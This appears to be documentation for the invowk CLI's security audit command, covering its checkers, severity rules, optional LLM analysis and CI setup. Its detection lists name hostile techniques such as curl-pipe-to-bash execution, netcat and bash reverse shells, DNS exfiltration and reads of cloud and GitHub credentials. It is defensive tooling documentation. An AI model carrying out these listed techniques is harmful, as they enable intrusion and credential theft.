Version: Next

Security Auditing

Invowk includes a built-in security scanner that analyzes invowkfiles, modules, vendored dependencies, and script content for supply-chain vulnerabilities, script injection, path traversal, suspicious patterns, and lock file integrity issues.

Quick Start

# Scan current directory
invowk audit

# Scan a specific module
invowk audit ./tools.invowkmod

# Only show high and critical findings
invowk audit --severity high

# JSON output for CI
invowk audit --format json

# Include global modules
invowk audit --include-global

How It Works

The invowk audit command builds an immutable snapshot of all discovered artifacts (invowkfiles, modules, scripts, lock files), then runs 7 built-in security checkers concurrently. After all checkers complete, a correlator cross-references findings to detect compound threats.

invowk audit [path]
  │
  ├── Discovery ──► Immutable ScanContext snapshot
  │
  ├── Concurrent Checkers (7 built-in + optional LLM)
  │   ├── Script Checker ──► execution, path-traversal, obfuscation findings
  │   ├── Lua Checker ──► virtual-lua execution, env, and path findings
  │   ├── Network Checker ──► execution and exfiltration findings
  │   ├── Env Checker ──► exfiltration findings
  │   ├── Lock File Checker ──► integrity findings
  │   ├── Symlink Checker ──► path-traversal findings
  │   ├── Module Metadata Checker ──► trust findings
  │   └── LLM Checker (opt-in) ──► multi-category findings
  │
  ├── Correlator ──► compound threat detection
  │
  └── Report ──► text or JSON output

Scan Targets

The scanner auto-detects the target type based on the path:

Path	What Gets Scanned
Directory (default `.`)	Root invowkfile + all `*.invowkmod` directories + discovery sources
`*.invowkmod` directory	Single module (invowkfile + lock file + vendored deps)
`*.cue` file	Single standalone invowkfile

When scanning a directory, the scanner also discovers modules from configured includes paths and optionally from ~/.invowk/cmds/ (with --include-global).

Built-in Checkers

Script Checker

Analyzes script content and paths for dangerous execution patterns.

Detects:

Remote code execution: curl | bash, wget | sh, silent download-and-execute
Path traversal: ../ sequences in script content
Obfuscation: base64 encoding/decoding, eval with dynamic content, hex sequences
Unusually large script files (>5 MiB)

Lua Checker

Analyzes virtual-lua scripts and runtime configuration for host access and bridge misuse.

Detects:

Disabled Lua API references (os.execute, io.popen, package.loadlib, debug, and direct file-loading helpers)
Sensitive environment reads through os.getenv() or the Invowk Lua environment bridge
Wildcard or network-capable allowed_binaries entries that let Lua invoke broad host commands
Full virtual filesystem access or broad path mappings exposed to Lua file APIs

Network Checker

Scans scripts for network access patterns that may indicate data exfiltration.

Detects:

Reverse shell patterns (bash, Python, netcat)
DNS exfiltration (dig, nslookup with dynamic subdomains)
Encoded URLs (base64-encoded network targets)
Suspicious network commands in unexpected contexts

Environment Checker

Analyzes environment configuration and script content for credential exposure risks.

Detects:

Risky env_inherit_mode: "all" and unset native/virtual-sh runtime env_inherit_mode defaults (both expose all host environment variables)
Access to sensitive variables: AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, DATABASE_URL, passwords, private keys
Credential extraction patterns in scripts

Lock File Checker

Validates module lock file integrity for tamper detection.

Detects:

SHA-256 hash mismatches between locked and actual module content
Orphaned lock entries (locked modules no longer in dependency tree)
Missing lock entries (dependencies not yet locked)
Ambiguous entries and version format issues

Symlink Checker

Walks module directories checking for symlink-based escape attacks.

Detects:

Symlinks pointing outside the module boundary
Symlink chains (symlink → symlink)
Dangling symlinks (target does not exist)
Any symlink in a module directory, because module packages should be self-contained
Unreadable symlink targets and incomplete directory walks that leave the scan with reduced coverage

Module Metadata Checker

Analyzes module dependency chains and metadata for supply-chain risks.

Detects:

Typosquatting: Module IDs similar to another module ID in the current scan (Levenshtein distance)
Fan-out: Modules with excessive dependency counts
Missing version pins: Dependencies without pinned versions
Undeclared transitive deps: Dependencies required by sub-dependencies but not declared in root invowkmod.cue
Vendored modules missing from requires: Dependencies present in invowk_modules/ without a matching declaration
Module invowkfile parse failures: Malformed module command files that prevent script-content auditing
Global module trust: Modules from ~/.invowk/cmds/ that bypass local review

Compound Threat Detection

The correlator identifies specific combinations in the same attack surface. Four rules combine different checkers; interpreter traversal combines two categories from the Script checker itself:

Compound Threat	Required Findings	Severity
Credential exfiltration	Env checker + Network checker	Critical
Path + symlink escape	Script checker + Symlink checker	Critical
Obfuscated exfiltration	Script/`obfuscation` + Network/`exfiltration`	Critical
Trust chain weakness	One dependency-graph trust code from Module Metadata + one missing, stale, or mismatched integrity code from Lock File	High
Interpreter traversal	Script/`execution` + Script/`path-traversal`	Critical

The trust-chain rule accepts only the module-metadata codes for wide dependency fan-out, undeclared transitive dependencies, or vendored modules missing from requires. Its lock-file side accepts the defined missing-lock, legacy-v1, missing-entry, unverifiable-vendored, or content-hash-mismatch integrity codes; unrelated findings from those checkers do not trigger the rule.

Automatic severity escalation:

3+ distinct security categories in the same surface → Critical
High + any other finding in the same surface → Critical
2+ Medium findings in the same surface → High

Severity Levels

Level	Meaning
`critical`	Immediate action required; likely active exploit or coordinated attack
`high`	Serious risk; should be addressed before using the module
`medium`	Notable concern; warrants investigation
`low`	Minor issue; consider addressing
`info`	Informational observation; no action typically needed

Use --severity to filter the minimum level shown:

# Only critical and high findings
invowk audit --severity high

# Everything including informational
invowk audit --severity info

Flags

Flag	Default	Description
`--format`	`text`	Output format: `text` or `json`
`--severity`	`low`	Minimum severity: `info`, `low`, `medium`, `high`, `critical`
`--include-global`	`false`	Include `~/.invowk/cmds/` in scan

Exit Codes

Code	Meaning
`0`	No confirmed findings at or above the severity threshold; suppressed-only reports exit successfully
`1`	Confirmed findings detected; generic CLI argument-validation errors also use Cobra's standard status 1
`2`	Audit scan or configuration error

LLM-Powered Analysis

For deeper semantic analysis beyond pattern matching, enable LLM-powered auditing with --llm-provider or --llm. This sends script content to a local CLI tool or remote/local OpenAI-compatible API. Bare invowk audit never uses global LLM config by itself; pass --llm to opt in to a configured backend.

:::info Why LLM analysis? Built-in checkers use regex patterns — they are fast and deterministic but can only detect known patterns. LLM analysis reasons about code intent, catching novel attack vectors, subtle logic flaws, and context-dependent security issues that regex cannot express. :::

Setup

The API-backed LLM checker works with OpenAI-compatible servers that provide both chat completions and model listing. Invowk always verifies an HTTP/API backend's configured model through its /models endpoint before scanning; a listing or verification failure aborts the audit with exit status 2. CLI-backed Claude, Codex, and Gemini providers delegate model handling to their CLI. The default API configuration targets Ollama, the most popular local LLM server:

# 1. Install Ollama from your package manager or https://ollama.com

# 2. Pull a code-focused model
ollama pull qwen2.5-coder:7b

# 3. Run the audit with LLM analysis
invowk audit --llm

You can configure one backend globally:

invowk config set llm.provider codex
invowk audit --llm

See Configuration Options for provider and API config, including llm.api.api_key_env for secret-free API credentials.

Provider Detection

Use --llm-provider to let invowk connect through local tools or cloud API credentials:

# Auto-detect: Ollama, env-var APIs, then CLI tools
invowk audit --llm-provider auto

# CLI providers use the tool's current default model when --llm-model is omitted
invowk audit --llm-provider claude
invowk audit --llm-provider codex
invowk audit --llm-provider gemini

# Explicit model override for a CLI provider
invowk audit --llm-provider codex --llm-model MODEL_NAME

# Env-var cloud APIs require an explicit model
OPENAI_API_KEY=sk-... invowk audit --llm-provider codex --llm-model MODEL_NAME

When ANTHROPIC_API_KEY, OPENAI_API_KEY, GEMINI_API_KEY, or GOOGLE_API_KEY selects a cloud API provider, --llm-model is required. CLI-backed providers delegate to Claude Code, Codex CLI, or Gemini CLI defaults unless you pass --llm-model.

Compatible Servers

Server	Default URL	Notes
Ollama	`http://localhost:11434/v1`	Default target, best local experience
LM Studio	`http://localhost:1234/v1`	GUI-first, good model browser
llamafile	`http://localhost:8080/v1`	Single-file executable, zero install
vLLM	`http://localhost:8000/v1`	Production-grade, GPU-optimized
OpenAI	`https://api.openai.com/v1`	Cloud, requires API key

LLM Flags

Flag	Default	Env Override	Description
`--llm-provider`	(empty)	—	Auto-detect or use `auto`, `claude`, `codex`, `gemini`, or `ollama`
`--llm`	`false`	—	Enable LLM-powered analysis using configured or API settings
`--llm-url`	`http://localhost:11434/v1`	`INVOWK_LLM_URL`	API base URL
`--llm-model`	`qwen2.5-coder:7b` for API/Ollama; CLI tool default for CLI providers	`INVOWK_LLM_MODEL`	Model name; required for env-var cloud API providers
`--llm-api-key`	(empty)	`INVOWK_LLM_API_KEY`	API key (empty for local servers)
`--llm-timeout`	`2m`	`INVOWK_LLM_TIMEOUT`	Per-request timeout
`--llm-concurrency`	`2`	`INVOWK_LLM_CONCURRENCY`	Max parallel LLM requests

Recommended Models

Model	RAM	Quality	Notes
`qwen2.5-coder:7b`	8 GB	Good	Default, fits most machines
`qwen2.5-coder:14b`	16 GB	Better	Good balance
`qwen2.5-coder:32b`	24 GB	Best	GPT-4o level for code
`deepseek-coder:33b`	24 GB	Excellent	Best for chain-of-thought reasoning

Model Auto-Detection

For every selected HTTP/API backend, Invowk lists models and verifies the configured model before scanning. If the endpoint fails, the audit stops with exit status 2. If the model is not found, Invowk shows:

The list of available models on the server
A suggestion for the best code-focused alternative (detected dynamically by pattern matching)

$ invowk audit --llm --llm-model nonexistent-model
LLM model not found: "nonexistent-model" is not available on the server; try: qwen2.5-coder:14b
available models: llama3:8b, qwen2.5-coder:14b, mistral:7b

The detection recognizes code-focused model families (qwen2.5-coder, deepseek-coder, codellama, codegemma, starcoder, codestral) regardless of version or quantization variant.

Examples

# Configure once, then opt in per audit run
invowk config set llm.provider codex
invowk audit --llm

# Auto-detect best available provider (local Ollama, cloud env vars, then CLI tools)
invowk audit --llm-provider auto

# Use a specific provider (works with OAuth — no API key needed)
invowk audit --llm-provider claude
invowk audit --llm-provider codex
invowk audit --llm-provider gemini

# Override model within a provider
invowk audit --llm-provider claude --llm-model claude-opus-4-6

# Manual configuration (Ollama, LM Studio, or any OpenAI-compatible server)
invowk audit --llm
invowk audit --llm --llm-url http://localhost:1234/v1

# Combined: provider + high severity + JSON
invowk audit --llm-provider auto --severity high --format json

How It Works

The LLM checker:

Verifies through the required model-list endpoint that an HTTP/API backend has the configured model (with suggestions if not); CLI providers delegate model handling to their CLI
Resolves inline and file-based script content, then filters out empty scripts
Batches scripts by character count (~6000 chars) and count (max 5 per batch)
Sends each batch to the LLM with a security analyst system prompt
Parses structured JSON findings from the response
Rejects malformed finding fields such as unknown severity/category values instead of silently treating bad LLM output as clean
Merges valid findings into the same pipeline as built-in checkers

When LLM analysis is explicitly requested, LLM checker failures are fatal scan errors. For example, malformed LLM finding fields such as unknown severity or category values cause the audit to fail with exit code 2 instead of falling back to partial deterministic results.

LLM findings participate in compound threat detection through the same correlator pipeline as built-in findings. They can contribute to Critical results when a named rule also matches (for example, sensitive environment-variable access plus network access) or when generic escalation conditions are met, such as a high-severity finding plus any other finding or three distinct categories on the same surface.

:::caution Script content is sent to the selected LLM backend Both --llm and --llm-provider enable analysis of script content from your invowkfiles and modules. API backends receive it over HTTP; CLI-backed Claude, Codex, and Gemini providers receive it through the selected CLI subprocess and may forward it according to that tool's behavior. Local API servers keep the HTTP payload on your machine. For cloud APIs and CLI providers, review the provider and tool data-handling policies. :::

CI Integration

Basic CI Gate

# Fail pipeline if any high/critical findings
invowk audit --severity high

JSON Output for Automation

# Capture JSON output without masking audit's exit code 1 for findings
set +e
invowk audit --format json > audit-results.json
status=$?
set -e

# Parse findings count
jq '.summary.total' audit-results.json

# List finding titles
jq '.findings[] | "[\\(.severity)] \\(.title)"' audit-results.json

# Check for compound threats
jq '.compound_threats' audit-results.json

exit "$status"

The JSON DTO includes:

Field	Description
`findings[]`	Confirmed findings at or above the severity threshold
`compound_threats[]`	Confirmed correlator findings at or above the severity threshold
`suppressed_findings[]`	Findings suppressed by triage rules
`suppressed_compound_threats[]`	Suppressed correlator findings
`diagnostics[]`	Non-finding scanner diagnostics
`summary.total`	Count of confirmed findings and compound threats at or above the severity threshold
`summary.suppressed`	Count of suppressed findings and suppressed compound threats at or above the severity threshold
`summary.critical` / `high` / `medium` / `low` / `info`	Confirmed finding counts by severity
`summary.modules_scanned`	Number of modules scanned
`summary.invowkfiles_scanned`	Number of invowkfiles scanned
`summary.scripts_scanned`	Number of script bodies scanned
`summary.duration_ms`	Scan duration in milliseconds

Each finding includes code, severity, category, checker_name, title, description, and recommendation, plus optional surface_id, surface_kind, file_path/line, and escalation provenance fields. Valid surface_kind values are root_invowkfile, local_module, vendored_module, and global_module.

Each suppressed finding or suppressed compound threat wraps the original entry as finding and includes disposition, rule, and rationale fields that explain why triage suppressed it.

GitHub Actions Example

- name: Security audit
  run: |
    set +e
    invowk audit --severity high --format json > audit-results.json
    status=$?
    set -e

    if [ "$status" -eq 1 ]; then
      echo "::error::Security findings detected"
      jq -r '(.findings[]?, .compound_threats[]?) | "[\(.severity)] \(.title)"' audit-results.json
      exit 1
    elif [ "$status" -ne 0 ]; then
      cat audit-results.json
      exit "$status"
    fi

With LLM in CI

- name: Start Ollama
  run: |
    # Use a runner image or setup step that installs Ollama explicitly.
    ollama serve > ollama.log 2>&1 &
    sleep 2
    ollama pull qwen2.5-coder:7b

- name: Security audit (with LLM)
  run: invowk audit --llm --severity high --format json

Quick Start​

How It Works​

Scan Targets​

Built-in Checkers​

Script Checker​

Lua Checker​

Network Checker​

Environment Checker​

Lock File Checker​

Symlink Checker​

Module Metadata Checker​

Compound Threat Detection​

Severity Levels​

Flags​

Exit Codes​

LLM-Powered Analysis​

Setup​

Provider Detection​

Compatible Servers​

LLM Flags​

Recommended Models​

Model Auto-Detection​

Examples​

How It Works​

CI Integration​

Basic CI Gate​

JSON Output for Automation​

GitHub Actions Example​

With LLM in CI​

Quick Start

How It Works

Scan Targets

Built-in Checkers

Script Checker

Lua Checker

Network Checker

Environment Checker

Lock File Checker

Symlink Checker

Module Metadata Checker

Compound Threat Detection

Severity Levels

Flags

Exit Codes

LLM-Powered Analysis

Setup

Provider Detection

Compatible Servers

LLM Flags

Recommended Models

Model Auto-Detection

Examples

How It Works

CI Integration

Basic CI Gate

JSON Output for Automation

GitHub Actions Example

With LLM in CI